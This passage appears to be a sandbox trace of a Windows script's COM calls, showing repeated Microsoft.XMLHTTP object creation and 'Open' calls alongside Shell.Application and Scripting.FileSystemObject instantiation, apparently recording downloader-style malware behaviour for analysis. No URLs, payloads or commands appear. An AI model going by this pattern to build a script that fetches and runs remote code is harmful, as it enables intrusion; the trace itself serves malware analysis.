	[0376.713] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0376.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0376.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0376.713] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0376.713] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0376.713] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0376.713] SysStringLen (param_1=0x0) returned 0x0
	[0376.713] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0376.714] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0376.714] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0376.714] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0376.714] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0376.714] ??2@YAPEAX_K@Z () returned 0x62f350
	[0376.714] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0376.714] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0376.714] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0376.714] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0376.714] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0376.714] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0376.714] SysStringLen (param_1=0x0) returned 0x0
	[0376.714] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0376.717] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0376.717] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0376.717] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0376.717] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0376.717] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0376.717] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0377.700] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0377.700] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0377.700] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0377.701] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0377.701] SysStringLen (param_1=0x0) returned 0x0
	[0377.701] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0377.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0377.702] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0377.702] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0377.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0377.702] ??2@YAPEAX_K@Z () returned 0x62f330
	[0377.702] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0377.702] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0377.702] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0377.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0377.702] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0377.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.702] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0377.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.705] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0377.705] SysStringLen (param_1=0x0) returned 0x0
	[0377.705] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0377.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0377.705] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77d0) returned 0x0
	[0377.705] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0377.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7838) returned 0x0
	[0377.705] ??2@YAPEAX_K@Z () returned 0x62f310
	[0377.705] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7838, pUnkSite=0x62f310) 
	[0377.705] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0377.705] XMLHTTPRequest:IUnknown:Release (This=0x49c7838) returned 0x0
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77d0) returned 0x0
	[0377.706] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77d0) returned 0x3
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.706] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.706] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0377.706] SysStringLen (param_1=0x0) returned 0x0
	[0377.706] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0377.706] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0377.706] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0377.706] ??2@YAPEAX_K@Z () returned 0x62f330
	[0377.706] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f330) 
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0377.706] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0377.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0377.707] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0377.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.707] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0377.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.707] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0377.707] SysStringLen (param_1=0x0) returned 0x0
	[0377.707] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0377.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0377.707] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7830) returned 0x0
	[0377.707] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0377.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7830, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0377.707] ??2@YAPEAX_K@Z () returned 0x62f310
	[0377.707] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0377.707] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0377.707] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0377.707] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7830, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7830) returned 0x0
	[0377.707] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7830) returned 0x3
	[0377.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7830, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0377.708] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7830, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0377.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7830, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0377.708] longjmp () 
	[0377.708] longjmp () 
	[0377.708] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0377.708] SysStringLen (param_1=0x0) returned 0x0
	[0377.708] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0377.708] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
